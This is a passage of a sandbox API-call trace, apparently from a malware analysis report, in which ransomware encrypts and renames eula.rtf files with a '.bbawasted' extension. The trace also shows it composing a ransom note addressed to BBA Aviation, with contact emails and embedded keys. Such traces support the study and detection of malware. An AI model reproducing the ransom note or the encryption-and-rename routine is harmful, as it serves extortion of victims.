lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0160.860] SetEndOfFile (hFile=0x27c) returned 1 [0160.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.863] CloseHandle (hObject=0x27c) returned 1 [0160.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0160.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1030 | out: hHeap=0x660000) returned 1 [0160.866] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0160.867] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0160.867] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.867] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 39 [0160.867] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0160.867] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.867] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.867] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0160.868] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0160.868] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.868] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0160.872] WriteFile (in: hFile=0x27c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.873] SetEndOfFile (hFile=0x27c) returned 1 [0160.873] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.873] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.873] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.bbawasted")) returned 1 [0160.941] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0160.941] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0160.941] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xe3b [0160.941] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe3b) returned 0x630000 [0160.942] CloseHandle (hObject=0x290) returned 1 [0160.947] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0160.948] CloseHandle (hObject=0x294) returned 1 [0160.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.948] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0160.948] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.949] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.949] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0160.949] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0160.949] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0160.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.995] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]j1FfsyvfBhDlaHZpiL4BXx4VBHk92Pe7xH4A8Kz5wSI7tezBaO9N6nfY1uddqyEP\r\ngf6WWrcbLqa76aPsS1hT9838aqRLeILgYt6/lTnvR7tojWUe5h37usCNhNzBDOLi\r\nZTQUWINCThuz02Ew3MFCKx3evffpR9NecoeK7/PC4ffr+dIMD/WOLL3SvZAzoy3X\r\nDywRfpTdhyB55XGxqKdCZi6f+QIhexFQbELQonL4KutTKtta9GxtmUPUiKqxFTAW\r\nfuVSbU3cM4liTa3ktF9SZv0k7/GF61jCI7rlLZP2lIe7U91UPiv+XTSzUG4UKybz\r\n+CYgcuhaHaoE2VqY+f1u5RHyAbsbdRfWoA1N95nCjteY54e3k06iF6ir+uuYTjp7\r\nbJeanP3s6jGP5cQcMCD8TfKtJSiGiS2WyTPn+Osh1AmRcwemdYh3y4jYC0Vf5vCH\r\nXT1T0axOVZ5AU+UgOTk+i8xzkCMfPn5ofcgdT0QC7ZTL6fnJH7y5BWTGHwe8RIng\r\n91NyWA/GCw62yyLlVnyv78KC4bMjas+RHQDNouANvkeZw8tdNXkFrO7Q2TUB4lMf\r\ni7tIXHmUVrOpi851nVj93eO6BnXmxz9U8ofXOYyDsiZdzRvi5e6FvBK7PZCFPFl9\r\n/j0046w74U1ofAvcs69P7/NPancQF+S8+JDxN2aTnsm=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0160.996] WriteFile (in: hFile=0x27c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0160.996] SetEndOfFile (hFile=0x27c) returned 1 [0160.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.999] CloseHandle (hObject=0x27c) returned 1 [0161.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0161.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1198 | out: hHeap=0x660000) returned 1 [0161.001] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0161.002] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0161.002] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0161.002] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 39 [0161.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0161.002] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0161.002] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0161.003] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0161.003] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.003] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0161.061] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.063] SetEndOfFile (hFile=0x288) returned 1 [0161.063] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0161.063] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.bbawasted")) returned 1 [0161.064] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0161.064] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0161.064] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x278d [0161.064] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x278d) returned 0x630000 [0161.064] CloseHandle (hObject=0x280) returned 1 [0161.136] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0161.137] CloseHandle (hObject=0x28c) returned 1 [0161.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.137] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0161.137] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.137] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.138] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0161.138] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0161.138] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0161.149] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]KnKFFd7pGm0K69qTvQ7b0jRWz0Chjc+6bI0KkSEFvXG87du1SS89jsgCCdz3ue2l\r\nY+EpL6aU63rBaTE8Wqi+36BEeL93Ar88u73k+N2BTVWe1zWivrzT4242xvJg6sCO\r\nfqe5751TOpVZshazUzcEQlgn3DHYL3OjTT0vnT02XWD1RpW8YDb/YfHHM3tRrBk/\r\nT6f++TZ52VUtK5hcQ3KLQSu2B+B0mJabrZri+xvtrenIfkGyAyzGhxOObCpwjNg9\r\n0PlBPI8evMXJzucXayWL3xxeadaFrZxt5tE5p0zR3/Od0hfAMXxKUjO+0sD9Xvaz\r\nXULS+l6g2FQQdXfl/PA+8z9wu+e6w3IzMyZkGamAm4KzgZPOl+X6xWUd8bExBc07\r\nTNzFK4IaH17gI6NddYgchRTb6iUoYhpWUB1gJKEewP/HCYkyNKdIyK9Uqg+TBOsY\r\n+0SBJ6hv6Px/8oFA+ftW03SBkhkjYXFSmxAdtNHSWbU8eeC9DLyMLGywK7bdXpIn\r\nM2Aq4CWANYOIZYZJ69WYoukp2F+5eyyUbRYP3/5pXE7GDbljlmObKK34BepvZcmt\r\nVlOrB2bQMv9lClL+AeboXz2zNImEwo/uPLtUEJ/LswroOZJtARzXbe49E1aISQ0t\r\nUsYn1qrihJr6VZUd8KlnkLm9mt/LQPr804zh80J6ouh=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.149] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0161.150] SetEndOfFile (hFile=0x288) returned 1 [0161.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0161.152] CloseHandle (hObject=0x288) returned 1 [0161.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0161.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1300 | out: hHeap=0x660000) returned 1 [0161.259] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0161.260] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0161.260] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0161.260] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 39 [0161.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0161.260] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.260] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x66c898) returned 1 [0161.261] CryptGenRandom (in: hProv=0x66c898, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.261] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0161.261] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0161.264] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.265] SetEndOfFile (hFile=0x288) returned 1 [0161.265] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.265] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.bbawasted")) returned 1 [0161.266] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0161.266] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0161.267] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xdda [0161.267] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdda) returned 0x630000 [0161.267] CloseHandle (hObject=0x27c) returned 1 [0161.284] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0161.285] CloseHandle (hObject=0x280) returned 1 [0161.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.285] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x66c898) returned 1 [0161.286] CryptGenRandom (in: hProv=0x66c898, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.286] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0161.286] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x66c898) returned 1 [0161.286] CryptGenRandom (in: hProv=0x66c898, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0161.286] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0161.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.297] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]CRaW6QkWHqznMgk6pFwl6FEXKtHOu8Sxi8nb91PUsKgV4kGiULesZ+N4+RUt9ZxW\r\n+DA1LiaUcUOC6OvJxJMgShcRfioWpeqS7Q0EyQ1WOIqo+6RpBhzcnblCN0PpL9P9\r\nZpYF5cWbPTXUuGh0KQMa1hTH6HE4QS9YXYFZCz42g/wFHIIXgb88ili8U2Z27vz2\r\n3m7ZNZuwHnyAXF9D0/ybnJToe43GvXebE2vmXilHPhtOdyvTKv6qaLWNbB1mfAqG\r\nJBmlq3jI6ks5j7jb0wdvTz2tM9UJC0W41bRDFot7h7qwY6ZViXRkgrTGzay1GJUd\r\nh1N0AG4nlMbXFdImSax9JbAOVSdiAmYaMEsljEX8v4ngaS4oM+TeUytVmhC/QhLY\r\nBvdVY+hCPh26d46KtbP2nbQ5U98M4zOcPmRRlW0qLqs2WntmRNpwQXrSLKlJucHo\r\nUq6bZMrdk6i4CsU7SoP8Re+BiIHNCIPJImshpNIRTKcjo4cRN9oIL2PHLP4mtz6l\r\nlhBdFdOKBcvodIpvCcUw6bzwRhmQnZypL4tcaRwWsPvKITK9Gcs2D6T13OFZvAHP\r\nH61kPAnLtKPfafmF38I9bsanI3sqnPva13dJu5lbxW+CDBTb9ulSw1Nlexsmolye\r\nyO112ZuCmXG+uHV8TjKYgCGpsBGW0UbX3ky7q6hzTDp=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.297] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0161.297] SetEndOfFile (hFile=0x288) returned 1 [0161.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.300] CloseHandle (hObject=0x288) returned 1 [0161.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0161.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2518 | out: hHeap=0x660000) returned 1 [0161.398] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a2518) returned 1 [0161.399] CryptGenRandom (in: hProv=0x6a2518, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0161.399] CryptReleaseContext (hProv=0x6a2518, dwFlags=0x0) returned 1 [0161.399] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 39 [0161.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0161.399] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.399] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0161.400] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.400] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.400] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0161.402] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.403] SetEndOfFile (hFile=0x288) returned 1 [0161.403] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.404] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.bbawasted")) returned 1 [0161.404] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 